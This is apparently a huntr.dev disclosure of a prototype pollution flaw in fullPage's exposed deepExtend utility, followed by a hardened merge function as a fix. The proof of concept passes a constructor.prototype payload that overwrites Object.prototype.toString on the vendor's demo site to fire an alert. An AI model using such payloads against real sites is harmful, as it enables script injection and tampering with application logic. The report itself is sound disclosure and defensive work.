huntr report 3B9D450C-24AC-4037-B04D-4D4DAFBF593A

Prototype Pollution

2022-02-26 14:07:56
r0hansh
www.huntr.dev
20

EPSS: 0.002 (Low)
EPSS Percentile: 57.1%

Description

fullPage exposes its utility functions to developers through window.fp_utils, so they can be reused for purposes other than fullPage itself. One of those utils, deepExtend, is vulnerable to prototype pollution.

JavaScript is a prototype-based language: when a new object is created, it inherits the predefined properties and methods of the base Object type, such as toString and constructor.
By exploiting a prototype pollution vulnerability, an attacker can overwrite or create properties on that shared Object prototype. If the application code uses such a property anywhere, the effect on the application can be severe.

For e.g.:

var obj = {};
console.log(obj.A); // undefined
obj["__proto__"].A = 1; // writes A onto Object.prototype, not onto obj
console.log(obj.A); // 1
var new_obj = {};
console.log(new_obj.A); // 1 -> every new object now inherits A (polluted)

Proof of Concept

STEP 1: Visit https://alvarotrigo.com/fullPage demo.

STEP 2: Run the following code in dev tools console

NOTE: I am asking to run this in the console for PoC purposes only. The real-world exploitation scenario may vary.

var o = {}; // plain object created before the pollution
o.toString(); // returns "[object Object]" as usual
// deepExtend walks {}.constructor (Object) -> .prototype (Object.prototype) and overwrites toString there
var obj = window.fp_utils.deepExtend({},{"constructor": {"prototype": {"toString": () => {alert(`XSS via Prototype Pollution`)}}}});

STEP 3: Call the toString prototype function on the object created in step 2

o.toString();

and an alert pops up, showing that the polluted toString is executed (XSS).

Impact

Prototype pollution can be used to create or overwrite predefined properties and methods of the Object type. Depending on the application code, it can lead to XSS, altered code logic, DoS, etc.
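The usual fix for a deep-merge helper like deepExtend is to refuse the keys that reach the prototype chain (__proto__, constructor, prototype) and to only descend into own, plain-object values. The following hardened merge is an added example, not fullPage's own code; safeDeepExtend, isPlainObject and demo are names chosen here, and the payload in demo is a constructed copy of the PoC shape from this report.

```javascript
// Hardened deep-extend (added example; not part of fullPage or window.fp_utils).
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  if (v === null || typeof v !== 'object' || Array.isArray(v)) return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Recursively merge `source` into `target` and return `target`.
// Keys that could reach the prototype chain are skipped and recorded in `skipped`
// so the caller can log/alert on a suspicious payload instead of silently merging.
function safeDeepExtend(target, source, skipped = []) {
  for (const key of Object.keys(source)) {           // own enumerable keys only
    if (UNSAFE_KEYS.has(key)) { skipped.push(key); continue; }
    const value = source[key];
    if (isPlainObject(value)) {
      // Reuse an existing *own* plain object on target; never walk into an
      // inherited one (target.constructor would otherwise resolve to Object).
      const existing =
        Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key])
          ? target[key] : {};
      target[key] = safeDeepExtend(existing, value, skipped);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Feed a constructed payload with the same shape as the PoC above through the
// hardened merge and report whether Object.prototype survived untouched.
function demo() {
  const payload = JSON.parse(
    '{"constructor":{"prototype":{"toString":"polluted"}},"a":{"b":1}}'
  );
  const skipped = [];
  const merged = safeDeepExtend({ a: { c: 2 } }, payload, skipped);
  const protoIntact =
    ({}).toString === Object.prototype.toString && ({}).toString() === '[object Object]';
  return { merged, skipped, protoIntact }; // skipped -> ['constructor'], protoIntact -> true
}
```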
